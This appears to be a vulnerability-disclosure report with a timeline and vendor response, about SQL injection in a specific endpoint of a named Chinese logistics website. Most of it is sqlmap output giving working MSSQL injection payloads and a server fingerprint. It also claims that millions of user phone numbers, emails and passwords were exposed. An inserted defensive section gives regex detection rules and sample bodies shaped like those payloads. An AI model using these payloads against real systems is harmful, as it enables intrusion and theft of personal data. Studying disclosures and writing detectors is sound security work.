2016-05-09: Details reported to the vendor, awaiting vendor response
2016-05-10: Vendor confirmed; details visible only to the vendor
2016-05-20: Details disclosed to core white hats and relevant domain experts
2016-05-30: Details disclosed to regular white hats
2016-06-09: Details disclosed to intern white hats
2016-06-24: Details disclosed to the public

Main site

Injection point:
http://www.chinawutong.com/ashx/infomationAppraise.ashx
POST:
cust_id=1&labletype=1&msgid=2839277&random=0.7775147766806185&type=ResLableDis
Run it through sqlmap:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cust_id (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: cust_id=-4198 OR 6688=6688&labletype=1&msgid=2839277&random=0.7775147766806185&type=ResLableDis

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: cust_id=1 AND 7375=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7375=7375) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)))&labletype=1&msgid=2839277&random=0.7775147766806185&type=ResLableDis

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: cust_id=(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3826=3826) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113))&labletype=1&msgid=2839277&random=0.7775147766806185&type=ResLableDis

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: cust_id=1 AND 7828=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&labletype=1&msgid=2839277&random=0.7775147766806185&type=ResLableDis

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: cust_id=1 UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+CHAR(105)+CHAR(80)+CHAR(106)+CHAR(85)+CHAR(75)+CHAR(99)+CHAR(86)+CHAR(69)+CHAR(68)+CHAR(87)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113),NULL-- &labletype=1&msgid=2839277&random=0.7775147766806185&type=ResLableDis
---
[21:04:18] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:04:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
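Added here as a defender's example, not part of the original report: detection rules keyed to the five injection families sqlmap listed above, run over constructed POST bodies shaped like those payloads, alongside the positive integer check on cust_id that would have rejected every one of them before it reached a query. The sample bodies and the rule set are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Detection rules keyed to the five injection families sqlmap reported for
# this endpoint (MSSQL). Illustrative, not a complete WAF ruleset.
SIGNATURES = {
    "boolean-blind": re.compile(r"\b(?:OR|AND)\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based":   re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    "inline-query":  re.compile(r"\(\s*SELECT\s+CHAR\s*\(", re.I),
    "time-heavy":    re.compile(r"FROM\s+sysusers\s+AS\s+\w+\s*,\s*sysusers", re.I),
    "union":         re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I),
}

def classify_body(body: str) -> dict:
    """Map each POST parameter to the families its value matches. parse_qs
    percent-decodes first (sqlmap sends payloads URL-encoded); one payload may
    hit several families, e.g. error-based ones embed an inline SELECT CHAR()."""
    hits = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        fams = [f for v in values for f, rx in SIGNATURES.items() if rx.search(v)]
        if fams:
            hits[name] = fams
    return hits

def is_plain_int(body: str, param: str) -> bool:
    """Positive check: cust_id must be exactly one integer; reject anything else
    before it reaches a query, whether or not a signature fires."""
    vals = parse_qs(body).get(param, [])
    return len(vals) == 1 and vals[0].strip().lstrip("-").isdigit()

def scan(bodies):
    """Return (index, hits, cust_id_ok) for every body worth alerting on."""
    out = []
    for i, b in enumerate(bodies):
        h, ok = classify_body(b), is_plain_int(b, "cust_id")
        if h or not ok:
            out.append((i, h, ok))
    return out

# Constructed sample bodies: one benign, the rest shaped like the report's
# payloads (the last one percent-encoded, as sqlmap actually sends it).
SAMPLE_BODIES = [
    "cust_id=1&labletype=1&msgid=2839277&type=ResLableDis",
    "cust_id=-4198 OR 6688=6688&labletype=1&msgid=2839277&type=ResLableDis",
    "cust_id=1 AND 7828=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2)&type=ResLableDis",
    "cust_id=1 UNION ALL SELECT CHAR(113)+CHAR(112),NULL-- &labletype=1",
    "cust_id=1%20AND%207375%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%29%29&labletype=1",
]
```

The signature list catches what sqlmap showed, but the integer check is the control that matters: the handler should bind cust_id as a typed parameter and never accept a non-integer at all.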
Pulling two rows each from a few tables shows the exposure: over 10 million (1000W+) logistics-order phone numbers; 1.66 million (166W) member phone numbers, emails and login passwords; over 7.4 million (740W+) vehicle-owner records.
You get the idea...

Severity: High
Vulnerability Rank: 18
Confirmed: 2016-05-10 12:06
Vendor response: Thanks for the report; someone has been assigned to fix it.
None yet